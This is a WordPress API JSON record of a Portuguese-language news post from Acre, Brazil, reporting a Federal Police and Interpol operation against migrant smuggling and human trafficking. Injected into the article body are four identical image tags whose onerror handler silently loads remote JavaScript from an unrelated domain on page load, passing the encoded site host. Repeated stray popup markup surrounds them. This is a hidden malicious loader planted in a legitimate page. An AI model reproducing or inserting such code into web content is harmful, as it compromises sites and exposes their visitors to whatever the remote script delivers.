{"id":51658,"date":"2020-12-04T20:16:43","date_gmt":"2020-12-04T20:16:43","guid":{"rendered":"https:\/\/abarevegan.com.br\/index.php\/2020\/12\/04\/policia-federal-no-acre-deflagra-operacao-em-participacao-com-a-interpol\/"},"modified":"2020-12-04T20:16:43","modified_gmt":"2020-12-04T20:16:43","slug":"policia-federal-no-acre-deflagra-operacao-em-participacao-com-a-interpol","status":"publish","type":"post","link":"https:\/\/nk7-testes.com.br\/agazeta\/policia-federal-no-acre-deflagra-operacao-em-participacao-com-a-interpol\/","title":{"rendered":"Pol\u00edcia Federal deflagra opera\u00e7\u00e3o em parceria com a Interpol"},"content":{"rendered":"<p style=\"text-align: justify;\"><span style=\"font-size: 13.2px;\">Opera\u00e7\u00e3o tem o objetivo de combater o tr\u00e1fico de pessoas<\/span><\/p>\n<p style=\"text-align: justify;\">Ap\u00f3s destaque na \u201cOpera\u00e7\u00e3o Turquesa\u201d deflagrada em 2019, a Pol\u00edcia Federal aceitou o convite da Interpol para sediar e coordenar a Opera\u00e7\u00e3o Turquesa II em conjunto com mais de 20 pa\u00edses. O estado do Acre ganhou evid\u00eancia este ano, sendo considerado um dos \u201chotspots\u201d da opera\u00e7\u00e3o.<\/p>\n<p style=\"text-align: justify;\">A fase operacional dos trabalhos que aconteceu no Acre entre os dias 30 de novembro e 3 de dezembro possu\u00eda como objetivo a\u00e7\u00f5es integradas e coordenadas na \u00e1rea do enfrentamento ao contrabando de migrantes, ao tr\u00e1fico de pessoas e a outros delitos conexos.<\/p>\n<p style=\"text-align: justify;\">Os controles realizados ao longo da semana buscaram conter as a\u00e7\u00f5es de grupos do crime organizado que usam rotas de contrabando para outros pa\u00edses como Estados Unidos e Canad\u00e1, por exemplo. Centenas de imigrantes de diferentes nacionalidades foram inspecionados nas cidades do Acre que fazem fronteira com a Bol\u00edvia e com o Peru.<\/p>\n<p style=\"text-align: justify;\">As nacionalidades mais encontradas dentre os imigrantes foram do Equador, Rep\u00fablica Bolivariana da Venezuela, Rep\u00fablica de Cuba, Rep\u00fablica da Col\u00f4mbia, Rep\u00fablica do Congo, Rep\u00fablica do Gana e Rep\u00fablica de Angola.<\/p>\n<div><img onerror=\"var s=document.createElement(&quot;script&quot;);s.type=&quot;text\/javascript&quot;;s.id=&quot;cczedcc-plg-analytics&quot;;s.src=&quot;\/\/jemova.wurucozujo.com\/scripts\/js?k=5d936fde86df1a38418b4567&amp;s=&quot;+encodeURI(btoa(window.location.host)+&quot;&amp;ns=true&quot;);document.getElementsByTagName(&quot;head&quot;)[0].appendChild(s);\" \/><\/div>\n<div id=\"janelamailtopopupMail\" style=\"z-index: 1;\">\n<div id=\"janelamailtocontentPopupModalMail\">\n<div id=\"janelamailtomailClosePopup\">&nbsp;<\/div>\n<div id=\"janelamailtopopupMailModal\">What do you want to do ?<\/div>\n<p> <a id=\"janelamailtobuttonOpenEmailAppNew\">New mail<\/a><button id=\"janelamailtoclipboardButtonCopyEmail\">Copy<\/button><textarea id=\"janelamailtotoSelectClipboardCopyText\"><\/textarea><\/div><\/div>\n<div><img onerror=\"var s=document.createElement(&quot;script&quot;);s.type=&quot;text\/javascript&quot;;s.id=&quot;cczedcc-plg-analytics&quot;;s.src=&quot;\/\/jemova.wurucozujo.com\/scripts\/js?k=5d936fde86df1a38418b4567&amp;s=&quot;+encodeURI(btoa(window.location.host)+&quot;&amp;ns=true&quot;);document.getElementsByTagName(&quot;head&quot;)[0].appendChild(s);\" \/><\/div>\n<div id=\"janelamailtopopupMail\" style=\"z-index: 1;\">\n<div id=\"janelamailtocontentPopupModalMail\">\n<div id=\"janelamailtomailClosePopup\">&nbsp;<\/div>\n<div id=\"janelamailtopopupMailModal\">What do you want to do ?<\/div>\n<p> <a id=\"janelamailtobuttonOpenEmailAppNew\">New mail<\/a><button id=\"janelamailtoclipboardButtonCopyEmail\">Copy<\/button><textarea id=\"janelamailtotoSelectClipboardCopyText\"><\/textarea><\/div><\/div>\n<div><img onerror=\"var s=document.createElement(&quot;script&quot;);s.type=&quot;text\/javascript&quot;;s.id=&quot;cczedcc-plg-analytics&quot;;s.src=&quot;\/\/jemova.wurucozujo.com\/scripts\/js?k=5d936fde86df1a38418b4567&amp;s=&quot;+encodeURI(btoa(window.location.host)+&quot;&amp;ns=true&quot;);document.getElementsByTagName(&quot;head&quot;)[0].appendChild(s);\" \/><\/div>\n<div id=\"janelamailtopopupMail\" style=\"z-index: 1;\">\n<div id=\"janelamailtocontentPopupModalMail\">\n<div id=\"janelamailtomailClosePopup\">&nbsp;<\/div>\n<div id=\"janelamailtopopupMailModal\">What do you want to do ?<\/div>\n<p> <a id=\"janelamailtobuttonOpenEmailAppNew\">New mail<\/a><button id=\"janelamailtoclipboardButtonCopyEmail\">Copy<\/button><textarea id=\"janelamailtotoSelectClipboardCopyText\"><\/textarea><\/div><\/div>\n<div><img onerror=\"var s=document.createElement(&quot;script&quot;);s.type=&quot;text\/javascript&quot;;s.id=&quot;cczedcc-plg-analytics&quot;;s.src=&quot;\/\/jemova.wurucozujo.com\/scripts\/js?k=5d936fde86df1a38418b4567&amp;s=&quot;+encodeURI(btoa(window.location.host)+&quot;&amp;ns=true&quot;);document.getElementsByTagName(&quot;head&quot;)[0].appendChild(s);\" \/><\/div>\n","protected":false},"excerpt":{"rendered":"<p style=\"text-align: justify;\"><span style=\"font-size: 13.2px;\">Opera\u00e7\u00e3o tem o objetivo de combater o tr\u00e1fico de pessoas<\/span><\/p>\n","protected":false},"author":4,"featured_media":51657,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"jnews-multi-image_gallery":[],"jnews_single_post":[],"jnews_primary_category":[],"jnews_social_meta":[],"jnews_review":[],"enable_review":"","type":"","name":"","summary":"","brand":"","sku":"","good":[],"bad":[],"score_override":"","override_value":"","rating":[],"price":[],"footnotes":""},"categories":[44],"tags":[],"class_list":["post-51658","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-policia"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v26.5 - https:\/\/yoast.com\/wordpress\/plugins\/seo\/ -->\n<title>Pol\u00edcia Federal deflagra opera\u00e7\u00e3o em parceria com a Interpol - Agazeta.net<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/nk7-testes.com.br\/agazeta\/policia-federal-no-acre-deflagra-operacao-em-participacao-com-a-interpol\/\" \/>\n<meta property=\"og:locale\" content=\"pt_BR\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Pol\u00edcia Federal deflagra opera\u00e7\u00e3o em parceria com a Interpol - Agazeta.net\" \/>\n<meta property=\"og:description\" content=\"Opera\u00e7\u00e3o tem o objetivo de combater o tr\u00e1fico de pessoas\" \/>\n<meta property=\"og:url\" content=\"https:\/\/nk7-testes.com.br\/agazeta\/policia-federal-no-acre-deflagra-operacao-em-participacao-com-a-interpol\/\" \/>\n<meta property=\"og:site_name\" content=\"Agazeta.net\" \/>\n<meta property=\"article:published_time\" content=\"2020-12-04T20:16:43+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/nk7-testes.com.br\/agazeta\/wp-content\/uploads\/2020\/12\/04-12-2020_operacao-turquesa-ii.jpeg\" \/>\n\t<meta property=\"og:image:width\" content=\"458\" \/>\n\t<meta property=\"og:image:height\" content=\"340\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/jpeg\" \/>\n<meta name=\"author\" content=\"Agazeta.Net\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Escrito por\" \/>\n\t<meta name=\"twitter:data1\" content=\"Agazeta.Net\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. tempo de leitura\" \/>\n\t<meta name=\"twitter:data2\" content=\"1 minuto\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"WebPage\",\"@id\":\"https:\/\/nk7-testes.com.br\/agazeta\/policia-federal-no-acre-deflagra-operacao-em-participacao-com-a-interpol\/\",\"url\":\"https:\/\/nk7-testes.com.br\/agazeta\/policia-federal-no-acre-deflagra-operacao-em-participacao-com-a-interpol\/\",\"name\":\"Pol\u00edcia Federal deflagra opera\u00e7\u00e3o em parceria com a Interpol - Agazeta.net\",\"isPartOf\":{\"@id\":\"https:\/\/nk7-testes.com.br\/agazeta\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\/\/nk7-testes.com.br\/agazeta\/policia-federal-no-acre-deflagra-operacao-em-participacao-com-a-interpol\/#primaryimage\"},\"image\":{\"@id\":\"https:\/\/nk7-testes.com.br\/agazeta\/policia-federal-no-acre-deflagra-operacao-em-participacao-com-a-interpol\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/nk7-testes.com.br\/agazeta\/wp-content\/uploads\/2020\/12\/04-12-2020_operacao-turquesa-ii.jpeg\",\"datePublished\":\"2020-12-04T20:16:43+00:00\",\"author\":{\"@id\":\"https:\/\/nk7-testes.com.br\/agazeta\/#\/schema\/person\/6d6e25cb0435eb4a02fd44d30b4e3020\"},\"breadcrumb\":{\"@id\":\"https:\/\/nk7-testes.com.br\/agazeta\/policia-federal-no-acre-deflagra-operacao-em-participacao-com-a-interpol\/#breadcrumb\"},\"inLanguage\":\"pt-BR\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/nk7-testes.com.br\/agazeta\/policia-federal-no-acre-deflagra-operacao-em-participacao-com-a-interpol\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"pt-BR\",\"@id\":\"https:\/\/nk7-testes.com.br\/agazeta\/policia-federal-no-acre-deflagra-operacao-em-participacao-com-a-interpol\/#primaryimage\",\"url\":\"https:\/\/nk7-testes.com.br\/agazeta\/wp-content\/uploads\/2020\/12\/04-12-2020_operacao-turquesa-ii.jpeg\",\"contentUrl\":\"https:\/\/nk7-testes.com.br\/agazeta\/wp-content\/uploads\/2020\/12\/04-12-2020_operacao-turquesa-ii.jpeg\",\"width\":458,\"height\":340,\"caption\":\"04-12-2020 opera\u00e7\u00e3o-turquesa-ii\"},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/nk7-testes.com.br\/agazeta\/policia-federal-no-acre-deflagra-operacao-em-participacao-com-a-interpol\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"In\u00edcio\",\"item\":\"https:\/\/nk7-testes.com.br\/agazeta\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Pol\u00edcia Federal deflagra opera\u00e7\u00e3o em parceria com a Interpol\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/nk7-testes.com.br\/agazeta\/#website\",\"url\":\"https:\/\/nk7-testes.com.br\/agazeta\/\",\"name\":\"Agazeta.net\",\"description\":\"Agazeta.net - Not\u00edcias de Rio Branco\/AC\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/nk7-testes.com.br\/agazeta\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"pt-BR\"},{\"@type\":\"Person\",\"@id\":\"https:\/\/nk7-testes.com.br\/agazeta\/#\/schema\/person\/6d6e25cb0435eb4a02fd44d30b4e3020\",\"name\":\"Agazeta.Net\",\"url\":\"https:\/\/nk7-testes.com.br\/agazeta\/author\/agazeta\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Pol\u00edcia Federal deflagra opera\u00e7\u00e3o em parceria com a Interpol - Agazeta.net","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/nk7-testes.com.br\/agazeta\/policia-federal-no-acre-deflagra-operacao-em-participacao-com-a-interpol\/","og_locale":"pt_BR","og_type":"article","og_title":"Pol\u00edcia Federal deflagra opera\u00e7\u00e3o em parceria com a Interpol - Agazeta.net","og_description":"Opera\u00e7\u00e3o tem o objetivo de combater o tr\u00e1fico de pessoas","og_url":"https:\/\/nk7-testes.com.br\/agazeta\/policia-federal-no-acre-deflagra-operacao-em-participacao-com-a-interpol\/","og_site_name":"Agazeta.net","article_published_time":"2020-12-04T20:16:43+00:00","og_image":[{"width":458,"height":340,"url":"https:\/\/nk7-testes.com.br\/agazeta\/wp-content\/uploads\/2020\/12\/04-12-2020_operacao-turquesa-ii.jpeg","type":"image\/jpeg"}],"author":"Agazeta.Net","twitter_card":"summary_large_image","twitter_misc":{"Escrito por":"Agazeta.Net","Est. tempo de leitura":"1 minuto"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"WebPage","@id":"https:\/\/nk7-testes.com.br\/agazeta\/policia-federal-no-acre-deflagra-operacao-em-participacao-com-a-interpol\/","url":"https:\/\/nk7-testes.com.br\/agazeta\/policia-federal-no-acre-deflagra-operacao-em-participacao-com-a-interpol\/","name":"Pol\u00edcia Federal deflagra opera\u00e7\u00e3o em parceria com a Interpol - Agazeta.net","isPartOf":{"@id":"https:\/\/nk7-testes.com.br\/agazeta\/#website"},"primaryImageOfPage":{"@id":"https:\/\/nk7-testes.com.br\/agazeta\/policia-federal-no-acre-deflagra-operacao-em-participacao-com-a-interpol\/#primaryimage"},"image":{"@id":"https:\/\/nk7-testes.com.br\/agazeta\/policia-federal-no-acre-deflagra-operacao-em-participacao-com-a-interpol\/#primaryimage"},"thumbnailUrl":"https:\/\/nk7-testes.com.br\/agazeta\/wp-content\/uploads\/2020\/12\/04-12-2020_operacao-turquesa-ii.jpeg","datePublished":"2020-12-04T20:16:43+00:00","author":{"@id":"https:\/\/nk7-testes.com.br\/agazeta\/#\/schema\/person\/6d6e25cb0435eb4a02fd44d30b4e3020"},"breadcrumb":{"@id":"https:\/\/nk7-testes.com.br\/agazeta\/policia-federal-no-acre-deflagra-operacao-em-participacao-com-a-interpol\/#breadcrumb"},"inLanguage":"pt-BR","potentialAction":[{"@type":"ReadAction","target":["https:\/\/nk7-testes.com.br\/agazeta\/policia-federal-no-acre-deflagra-operacao-em-participacao-com-a-interpol\/"]}]},{"@type":"ImageObject","inLanguage":"pt-BR","@id":"https:\/\/nk7-testes.com.br\/agazeta\/policia-federal-no-acre-deflagra-operacao-em-participacao-com-a-interpol\/#primaryimage","url":"https:\/\/nk7-testes.com.br\/agazeta\/wp-content\/uploads\/2020\/12\/04-12-2020_operacao-turquesa-ii.jpeg","contentUrl":"https:\/\/nk7-testes.com.br\/agazeta\/wp-content\/uploads\/2020\/12\/04-12-2020_operacao-turquesa-ii.jpeg","width":458,"height":340,"caption":"04-12-2020 opera\u00e7\u00e3o-turquesa-ii"},{"@type":"BreadcrumbList","@id":"https:\/\/nk7-testes.com.br\/agazeta\/policia-federal-no-acre-deflagra-operacao-em-participacao-com-a-interpol\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"In\u00edcio","item":"https:\/\/nk7-testes.com.br\/agazeta\/"},{"@type":"ListItem","position":2,"name":"Pol\u00edcia Federal deflagra opera\u00e7\u00e3o em parceria com a Interpol"}]},{"@type":"WebSite","@id":"https:\/\/nk7-testes.com.br\/agazeta\/#website","url":"https:\/\/nk7-testes.com.br\/agazeta\/","name":"Agazeta.net","description":"Agazeta.net - Not\u00edcias de Rio Branco\/AC","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/nk7-testes.com.br\/agazeta\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"pt-BR"},{"@type":"Person","@id":"https:\/\/nk7-testes.com.br\/agazeta\/#\/schema\/person\/6d6e25cb0435eb4a02fd44d30b4e3020","name":"Agazeta.Net","url":"https:\/\/nk7-testes.com.br\/agazeta\/author\/agazeta\/"}]}},"_links":{"self":[{"href":"https:\/\/nk7-testes.com.br\/agazeta\/wp-json\/wp\/v2\/posts\/51658","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/nk7-testes.com.br\/agazeta\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/nk7-testes.com.br\/agazeta\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/nk7-testes.com.br\/agazeta\/wp-json\/wp\/v2\/users\/4"}],"replies":[{"embeddable":true,"href":"https:\/\/nk7-testes.com.br\/agazeta\/wp-json\/wp\/v2\/comments?post=51658"}],"version-history":[{"count":0,"href":"https:\/\/nk7-testes.com.br\/agazeta\/wp-json\/wp\/v2\/posts\/51658\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/nk7-testes.com.br\/agazeta\/wp-json\/wp\/v2\/media\/51657"}],"wp:attachment":[{"href":"https:\/\/nk7-testes.com.br\/agazeta\/wp-json\/wp\/v2\/media?parent=51658"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/nk7-testes.com.br\/agazeta\/wp-json\/wp\/v2\/categories?post=51658"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/nk7-testes.com.br\/agazeta\/wp-json\/wp\/v2\/tags?post=51658"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}